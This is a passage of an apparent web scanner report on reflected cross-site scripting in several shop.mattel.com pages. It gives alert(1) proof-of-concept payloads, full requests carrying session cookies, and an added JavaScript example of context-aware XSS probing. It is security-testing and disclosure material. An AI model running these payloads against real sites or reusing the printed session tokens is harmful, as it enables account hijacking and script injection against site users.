<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
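How findings 1.43 and 1.44 are reached, as an added example that is neither the scanner's code nor the site's: the parameter name is first reflected with a harmless canary, the context of every reflection is classified by walking the response the way an HTML tokenizer would, and a context-specific probe (the --><script>alert(1)</script> and "-alert(1)-" shapes the report shows) is sent for each one and counted as confirmed only if alert(1) lands as plain JavaScript code. The response skeleton is constructed to mimic the sinks in these responses; the variable name qs, the <p> echo and the encoded variant mockPageEncoded are assumptions. Also worth noting from the responses at 1.43 and 1.44: JSESSIONID is set with only path=/ and no HttpOnly attribute, so a payload that runs here can read the session cookie.

```javascript
// A page that echoes the raw query string three times, as /product/index.jsp
// does (constructed; the <p> echo and "qs" are assumptions).
function mockPage(queryString) {
  return [
    '<!DOCTYPE html><html><head>',
    '<!-- === Request Query String: ' + queryString + ' -->',
    '<script type="text/javascript"> if(ess){}else{ var ess = {}; }',
    'var qs = "' + queryString + '";',
    '</script></head><body><p>Query: ' + queryString + '</p></body></html>',
  ].join('\n');
}

// Same page with a plain HTML-entity encoder applied before echoing (added
// for contrast; not what the site did).
function mockPageEncoded(queryString) {
  return mockPage(queryString.replace(/[<>"'&]/g, (c) => '&#' + c.charCodeAt(0) + ';'));
}

// Walk the body like an HTML tokenizer and report the context at each
// occurrence of `marker`: html-text, html-tag, html-comment, js-code,
// js-comment, or js-string-<quote>.
function contextsAt(body, marker) {
  const offsets = [];
  for (let i = body.indexOf(marker); i !== -1; i = body.indexOf(marker, i + 1)) offsets.push(i);
  const wanted = new Set(offsets);
  const found = new Map();
  const lower = body.toLowerCase();
  let state = 'text';     // text | comment | tag | script
  let quote = null;       // in script: '"', "'", '`', '//' or '/*' while inside a literal/comment
  let scriptTag = false;  // the tag being read opens a <script> element
  for (let i = 0; i < body.length; i++) {
    if (wanted.has(i)) {
      let label = 'html-' + state;
      if (state === 'script') {
        label = quote === null ? 'js-code'
          : (quote === '//' || quote === '/*') ? 'js-comment' : 'js-string-' + quote;
      }
      found.set(i, label);
    }
    const c = body[i];
    if (state === 'text') {
      if (body.startsWith('<!--', i)) { state = 'comment'; i += 3; }
      else if (c === '<') { state = 'tag'; scriptTag = lower.startsWith('<script', i); }
    } else if (state === 'comment') {
      if (body.startsWith('-->', i)) { state = 'text'; i += 2; }
    } else if (state === 'tag') {
      if (c === '>') { state = scriptTag ? 'script' : 'text'; quote = null; }
    } else if (lower.startsWith('</script', i)) {
      // The HTML tokenizer closes the element here even inside a JS string,
      // which is why "</script>" in string data is itself a breakout.
      state = 'tag'; scriptTag = false; quote = null;
    } else if (quote === '//') { if (c === '\n') quote = null; }
    else if (quote === '/*') { if (body.startsWith('*/', i)) { quote = null; i++; } }
    else if (quote !== null) { if (c === '\\') i++; else if (c === quote) quote = null; }
    else if (c === '"' || c === "'" || c === '`') quote = c;
    else if (c === '/' && body[i + 1] === '/') quote = '//';
    else if (c === '/' && body[i + 1] === '*') { quote = '/*'; i++; }
  }
  return offsets.map((o) => found.get(o));
}

// Breakout probe per context, in the shape the report's payloads use.
const PROBES = {
  'html-comment': '--><script>alert(1)</script>',
  'html-text': '<script>alert(1)</script>',
  'js-string-"': '"-alert(1)-"',
  "js-string-'": "'-alert(1)-'",
  'js-string-`': '`-alert(1)-`',
};

// `render` maps a query string to a response body. Returns one entry per
// reflection of the parameter name: the context seen with the canary and
// whether the matching probe put alert(1) into executable position.
function scanParameterName(render, prefix, suffix) {
  const canary = prefix + suffix;
  const contexts = contextsAt(render(canary + '=1'), canary);
  return contexts.map((context, i) => {
    const probe = PROBES[context];
    if (!probe) return { context, probe: null, confirmed: false };
    const landed = contextsAt(render(prefix + probe + suffix + '=1'), 'alert(1)');
    return { context, probe, confirmed: landed[i] === 'js-code' };
  });
}

console.log(scanParameterName(mockPage, 'babdb', '332e4ffe94'));
console.log(scanParameterName(mockPageEncoded, 'babdb', '332e4ffe94'));
```

The canary step matters because the probes are not interchangeable: the comment probe reflected into the JavaScript string stays inside the literal, and the string probe reflected into the comment never leaves it, so each sink is only confirmed by its own probe, which is why the report lists the comment and the script string as separate findings for the same parameter name.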
1.45. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /productAlerts/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 71d78--><script>alert(1)</script>e4fc885191d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /productAlerts/index.jsp?71d78--><script>alert(1)</script>e4fc885191d=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:29 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.46. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /productAlerts/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dca1"-alert(1)-"291191fc800 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productAlerts/index.jsp?5dca1"-alert(1)-"291191fc800=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:28 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.47. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /reviews/submitReview.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a7fe"-alert(1)-"d845562a2b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/submitReview.jsp?7a7fe"-alert(1)-"d845562a2b8=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:29 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.48. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /reviews/submitReview.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 758cb--><script>alert(1)</script>0cca78edec4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /reviews/submitReview.jsp?758cb--><script>alert(1)</script>0cca78edec4=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:30 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37638
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt ...[SNIP]... <!-- === Request Query String: 758cb--><script>alert(1)</script>0cca78edec4=1 --> ...[SNIP]...
1.49. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /shop/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6ed87--><script>alert(1)</script>0129bd33332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /shop/index.jsp?categoryId=3719992&6ed87--><script>alert(1)</script>0129bd33332=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:38 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39101
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <!-- === Request Query String: categoryId=3719992&6ed87--><script>alert(1)</script>0129bd33332=1 --> ...[SNIP]...
1.50. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /shop/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fccb6"-alert(1)-"478d101b660 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shop/index.jsp?categoryId=3719992&fccb6"-alert(1)-"478d101b660=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:37 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39053
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.51. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /sitemap/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5759d--><script>alert(1)</script>be4ed9b675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /sitemap/index.jsp?5759d--><script>alert(1)</script>be4ed9b675c=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:32 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66217
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <!-- === Request Query String: 5759d--><script>alert(1)</script>be4ed9b675c=1 --> ...[SNIP]...
1.52. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /sitemap/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a297a"-alert(1)-"2de4c0c0fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap/index.jsp?a297a"-alert(1)-"2de4c0c0fc=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:31 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66183
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.53. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /storeLocator/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f83"-alert(1)-"b1391c45b7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /storeLocator/index.jsp?b0f83"-alert(1)-"b1391c45b7e=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:26 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.54. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /storeLocator/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a988f--><script>alert(1)</script>da1042d0f3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /storeLocator/index.jsp?a988f--><script>alert(1)</script>da1042d0f3d=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
